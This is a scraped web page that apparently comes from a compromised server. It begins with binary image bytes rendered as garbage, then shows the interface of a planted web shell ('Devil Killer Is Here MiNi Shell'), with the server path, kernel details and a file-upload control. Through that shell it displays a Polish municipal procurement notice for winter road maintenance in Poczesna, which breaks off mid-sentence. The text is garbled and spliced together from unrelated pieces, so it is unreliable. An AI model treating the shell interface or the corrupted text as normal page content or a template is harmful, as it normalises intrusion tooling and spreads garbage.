JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211027/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211027/0024781901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Zimowe utrzymanie dróg gminnych na terenie gminy Poczesna<br/>w sezonie zimowym 2021/2022”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Poczesna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398149</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolności 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poczesna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-262</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczesna@poczesna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.poczesna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zimowe utrzymanie dróg gminnych na terenie gminy Poczesna<br/>w sezonie zimowym 2021/2022”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-66b44568-370f-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00247819</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002036/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Zimowe utrzymanie dróg na terenie gminy Poczesna w sezonie 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://poczesna.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://poczesna.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu komunikacja odbywa się wyłącznie elektronicznie przy użyciu platformy do<br/>elektronicznej obsługi zamówień. Szczegóły dotyczące komunikacji zapisane zostały w rozdz. VII i VIII<br/>SWZ.1. Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) –<br/>zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod<br/>adresem: https://poczesna.logintrade.net/rejestracja/instrukcje.html<br/>2. oraz zaakceptować regulamin korzystania z Platformy przetargowej dostępny pod adresem:<br/>https://poczesna.logintrade.net/rejestracja/regulamin.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest: Wójt Gminy Poczesna Pan Krzysztof Ujma z<br/>siedzibą władz w Urzędzie Gminy ul Wolności 2, 42-262 Poczesna<br/> Administrator wyznaczył Inspektora Ochrony Danych - Pana Mariusza Matyja, z którym może się<br/>Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób:<br/>• pod adresem poczty elektronicznej: abi@poczesna.pl<br/>• pisemnie na adres siedziby Administratora;Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego: „Zimowe utrzymanie dróg gminnych na terenie<br/>gminy Poczesna w sezonie zimowym 2021/2022”, nr postępowania ZP.271.3.13.2021.DM<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019 z późn.zm.), dalej „ustawa Pzp”;<br/> Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede<br/>wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba<br/>że przepisy szczególne stanowią inaczej;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(1);<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych (2);<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.3.13.2021.DM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zakres prac obejmuje:<br/>	odśnieżanie dróg gminnych – całej szerokości jezdni (w dwóch kierunkach drogi), skrzyżowań, rozjazdów, wysepek przystankowych, placów gminnych, a także zasp nawianych na drogi z pól. Przy odśnieżaniu skrzyżowań należy zwrócić uwagę na usunięcie śniegu z całego skrzyżowania (środka również) oraz w razie konieczności wywóz nadmiaru śniegu z miejsc wskazanych przez Zamawiającego,<br/>	likwidację śliskości zimowej – poprzez posypywanie dróg piaskiem z 25 % dodatkiem soli (głównie skrzyżowań i stromych podjazdów, wysepek przystankowych, placów gminnych). Mieszankę piaskowo-solną do posypywania zabezpiecza sam Wykonawca i do obowiązków Wykonawcy należeć będzie odpowiednie przechowywanie materiału, zapobiegające jego zawilgoceniu i zamarzaniu,<br/>	sprzątanie materiału użytego do usuwania śliskości po zimowym utrzymaniu z dróg gminnych (przewidziane jako jednorazowa usługa).<br/><br/>2. Łączna długość dróg na terenie gminy Poczesna to 66,3 km<br/><br/>3.	Zimowe utrzymanie dróg gminnych ma na celu likwidacje zakłóceń ruchu drogowego wywołanych czynnikami atmosferycznymi jak opady śniegu i mróz wg standardu określonego w załączniku do umowy zgodnie z Zarządzeniem Ministra Transportu i Gospodarki Morskiej nr 46 z dnia 25 października 1994 r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych (Dz. U. MTiG Nr 10, poz.20).<br/><br/>4.	Zamawiający nie bierze odpowiedzialności z tytułu uszkodzeń mienia wskutek działań w ramach akcji zimowego utrzymania dróg, takich jak np. odpryski lakieru na samochodach wskutek działania maszyn odśnieżających, uszkodzenia ogrodzeń i innych obiektów bądź elementów zabudowy wskutek działania pługów itp., a wynikające z niestarannego wykonywania usługi przez operatorów. W związku z powyższym w interesie Wykonawcy jest zwrócenie szczególnej uwagi na zachowanie najwyższej staranności w trakcie prowadzonej akcji, zwłaszcza w miejscach wąskich, słabo dostępnych, z małą możliwością manewru.<br/><br/>5.	Wykonawca zobowiązuje się do utrzymania w całym sezonie zimowym 2021 <br/>w gotowości technicznej sprzętu służącego do odśnieżania.<br/><br/>6.	Pojazdy wykorzystywane do wykonywania prac przy odśnieżaniu dróg muszą być wyposażone w ostrzegawczy sygnał świetlny błyskowy barwy żółtej samochodowej (ustawa z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym).<br/><br/>7.	Realizując zakres zamówienia Wykonawca zobowiązany jest do :<br/>	stosowania Zarządzenia Ministra Transportu i Gospodarki Morskiej nr 46 z dnia 25.10.1994 r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych (Dz.U.MTiG Nr 10, poz. 20),<br/>	zapewnienia we własnym zakresie materiału do posypywania dróg celem usunięcia śliskości tj. piasku i mieszkanki piaskowo-solnej 25 %<br/>	prowadzenia stałych obserwacji warunków atmosferycznych i informowania Zamawiającego o potrzebie podjęcia działań dla utrzymania dróg gminnych <br/>w należytym stanie,<br/>	bezwzględnego respektowania poleceń pracownika Urzędu Gminy Poczesna odpowiedzialnego za utrzymanie dróg gminnych,<br/>	w przypadku wystąpienia złych warunków atmosferycznych w ciągu godziny podjąć akcję odśnieżania i posypywania na drogach gminnych po telefonicznym ustaleniu <br/>z przedstawicielem Zamawiającego zakresu i rodzaju usług do wykonywania,<br/>	odśnieżania i posypywania do 3 godzin od zgłoszenia przez Zamawiającego,<br/>	całkowita likwidacja skutków pogarszania warunków atmosferycznych na drogach na terenie gminy w ciągu 5 godzin od zaprzestania opadów,<br/>	zapewnienie łączności z pracującym lub dyżurującym sprzętem, prowadzenie zapisów interwencyjnych,<br/>	Wykonawca przystępuje do wykonania usługi również na polecenie dyspozytorów <br/>z MPK lub PKS, Policji oraz w oparciu o własną ocenę warunków pogodowych <br/>i sytuacji na drogach.<br/><br/>8.	Wykaz dróg i placów gminnych na terenie Gminy Poczesna z uwzględnieniem standardów zimowego utrzymania – stanowi Załącznik nr 1 do umowy. Standard zimowego utrzymania dróg określa załącznik nr 2 do umowy. Projektowane postanowienia umowy, które zostaną wprowadzone do treści umowy -w sprawie zamówienia stanowią załącznik nr 3 do SWZ.<br/><br/>9.	Wymóg zatrudnienia na umowę o pracę:<br/><br/>9.1. Zamawiający działając na podstawie art. 95 ust. 1 ustawy Pzp, wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r.- Kodeks pracy (t.j. Dz.U. z 2020. poz. 1320 z późn. zm.) wszystkich osób, które będą wykonywać następujące czynności w zakresie realizacji przedmiotu zamówienia:<br/>a) przedstawiciel Wykonawcy – który przy realizacji usługi będzie koordynował i nadzorował pracę w sposób zgodny w SWZ, wymaganiami Zamawiającego oraz przepisami bezpieczeństwa i higieny pracy,<br/>b) kierowcy i operatorzy sprzętu,<br/>jeżeli wykonywanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeksu pracy (t.j. Dz.U. z 2020 r. poz. 1320 z późn. zm.). Wymóg ten nie dotyczy osób fizycznych prowadzących działalność gospodarczą, urzędujących członków organów zarządzających lub nadzorczych Wykonawcy, wspólników spółki jawnej lub partnerskiej w zakresie, w jakim będą wykonywać osobiście roboty na rzecz Zamawiającego bądź Wykonawcy.<br/><br/>9.2. W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w pkt 1 czynności. Zamawiający uprawniony jest w szczególności do:<br/>a) żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów i dokonywania ich oceny,<br/>b) żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,<br/>c) przeprowadzania kontroli na miejscu wykonywania świadczenia,<br/><br/>9.3. W trakcie realizacji zamówienia na każde wezwanie Zamawiającego w wyznaczonym w tym wezwaniu terminie nie krótszym niż 3 dni Wykonawca przedłoży Zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących wskazane w pkt 1 czynności w trakcie realizacji zamówienia:<br/>1)	oświadczenie zatrudnionego pracownika;<br/>2)	oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, imion i nazwisk tych osób, daty zawarcia umowy o pracę, rodzaju umowy o pracę, zakresy obowiązków pracowników oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy;<br/>2) poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j. Dz.U. z 2019 r., poz. 1781) oraz przepisami rozporządzenia Parlamentu Europejskiego i Rady UE) 2016/679 z dnia 27 kwietnia 2016 w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: RODO) (tj. w szczególności bez adresów, nr PESEL pracowników). Imię i nazwisko pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę, zakres obowiązków powinny być możliwe do zidentyfikowania;<br/>3) zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez Wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;<br/>4) poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie przepisami RODO, ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych. Imię i nazwisko pracownika nie podlega anonimizacji.<br/><br/>9.5. W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez wykonawcę lub Podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 5. Zakres opcji obejmuje 40% ilości kilometrów określonych przez Zamawiającego odpowiednio<br/>dla: odśnieżania posypywania oraz sprzątania materiału użytego do usuwania śliskości po<br/>zimowym utrzymaniu.6. Warunki skorzystania z opcji:<br/>a) skorzystanie z zamówienia opcjonalnego (opcji) uzależnione będzie od potrzeb<br/>Zamawiającego spowodowanych panującymi warunkami atmosferycznymi, skutkującymi<br/>potrzebą zwiększenia ilości kilometrów odśnieżania, posypywania oraz sprzątania materiału<br/>użytego do usuwania śliskości po zimowym utrzymaniu,<br/>b) termin, w ciągu którego Zamawiający ma prawo skorzystać z prawa opcji - w terminie trwania<br/>umowy,<br/>c) o zamiarze skorzystania z prawa opcji, w określonym zakresie, Zamawiający poinformuje<br/>Wykonawcę odrębnym oświadczeniem - zamówieniem. Brak stosownego zamówienia świadczy<br/>o rezygnacji z zamówienia opcjonalnego w całości lub w części (jeżeli Zamawiający skorzystał<br/>częściowo z zamówień opcjonalnych),<br/>d) Zamawiający może skorzystać z zamówienia opcjonalnego w całości lub w części, w<br/>zależności od potrzeb,<br/>e) Wykonawca zobowiązany jest do realizacji zamówienia przewidzianego opcją na warunkach<br/>opisanych w SWZ i niniejszej umowie.<br/>7. Zamówienia realizowane w ramach opcji są jednostronnym uprawnieniem Zamawiającego.Brak złożenia zamówień objętych opcją nie rodzi po stronie Wykonawcy żadnych roszczeń w<br/>stosunku do Zamawiającego. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się<br/>kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>a) cena ofertowa – 60 pkt<br/>b) kryterium środowiskowe – normy emisji spalin pojazdów, którymi będzie realizowany przedmiot<br/>zamówienia (IPnes) – 40 pkt.<br/>2. Każdy z Wykonawców w ww. kryteriach otrzyma odpowiednią ilość punktów, wyliczoną w<br/>następujący sposób:<br/>ad. a) cena ofertowa IPc - maksymalnie 60 pkt - wg następującego wzoru:<br/>Maksymalną ilość punktów - 60 - otrzyma oferta z najniższą oferowaną ceną brutto za wykonanie<br/>przedmiotu zamówienia. Przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch<br/>miejsc po przecinku według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie<br/>drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra<br/>po przecinku nie ulega zmianie.<br/>L.p. Opis kryteriów oceny Maksymalna zakładana ilość km Waga<br/>P1 cena odśnieżania za 1km 800 35%<br/>P2 cena posypywania<br/>z materiałem za 1km 900 20 %<br/>P3 sprzątnięcie materiału użytego do usuwania śliskości po zimowym utrzymaniu (przewidziane jako<br/>jednorazowa usługa) za 1 km 66,3 5 %Sposób oceny ofert.<br/>• Porównane będą zaoferowane przez poszczególnych Wykonawców odpowiednie ceny jednostkowe.<br/>• Wybrana będzie oferta najkorzystniejsza, przez co należy rozumieć ofertę o najkorzystniejszej ilości<br/>punktów wyliczonych według poniższych zasad.<br/>• Sposób punktacji (przy założeniu, że 1% z w/w współczynników odpowiada 1 punktowi), jaki<br/>Zamawiający będzie stosował przy ocenie ofert:<br/>IPc = P1+P2 + P3<br/>IPc – suma punktów dla oferty<br/>P1÷P3 - ilość punktów wyliczona dla poszczególnych cen jednostkowych według wzoru:<br/>P1 = Cn/Cb x W<br/>P2 = Cn/Cb x W<br/>P3 = Cn/Cb x W<br/>gdzie:<br/>Cn – najniższa oferowana cena jednostkowa danej pozycji wśród wszystkich złożonych ważnych ofert.<br/>Cb – oferowana cena jednostkowa danej pozycji zaoferowana w badanej ofercie.<br/>W – znaczenie w % (zgodnie z powyższą tabelą wag.)<br/>Uwaga nr 3: Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku<br/>podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej<br/>oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązekrozliczyć zgodnie z tymi przepisami<br/>Uwaga nr 4: przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po<br/>przecinku według zasady, że trzecia 